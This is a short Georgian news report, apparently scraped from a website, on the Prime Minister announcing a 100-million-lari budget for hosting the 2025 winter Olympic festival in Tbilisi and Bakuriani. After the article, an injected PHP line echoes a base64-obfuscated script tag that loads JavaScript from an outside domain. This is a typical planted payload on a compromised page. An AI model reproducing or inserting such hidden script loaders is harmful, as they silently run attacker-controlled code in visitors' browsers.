celsiusi
ავერსი საქკაბელი

2025 წლის ზამთრის ოლიმპიური ფესტივალის ორგანიზება საქართველოს 100 მილიონი ლარი დაუჯდება. ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა მთავრობის სხდომის დაწყებისას განაცხადა.

მისივე თქმით, ფესტივალისთვის მზადების ფარგლებში, თბილისსა და ბაკურიანში სხვადასხვა ინფრასტრუქტურული პროექტები განხორციელდება.

„კიდევ ერთი მნიშვნელოვანი ღონისძიებისთვის მზადებას ვიწყებთ. მოგეხსენებათ, რომ 2025 წელს საქართველო ზამთრის ოლიმპიურ ფესტივალს უმასპინძლებს. ამის თაობაზე დღეს გვექნება მსჯელობა. ჩვენ 100 მილიონი ლარი უნდა გამოვყოთ ბიუჯეტიდან და ფესტივალისთვის დავიწყებთ მზადებას. ბაკურიანში მოეწყობა ბიატლონისა და თხილამურებით რბოლის მოედანი, თბილისში აშენდება ყინულის სასახლე და სხვა ახალი ინფრასტრუქტურა დაემატება თბილისს და ბაკურიანს. წელს 25 მილიონი ლარი უკვე გამოყოფილია. ჯამში, 100 მილიონი ლარი დაგვიჯდება ამ ფესტივალის ორგანიზება,“ -განაცხადა ღარიბაშვილმა.

853
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");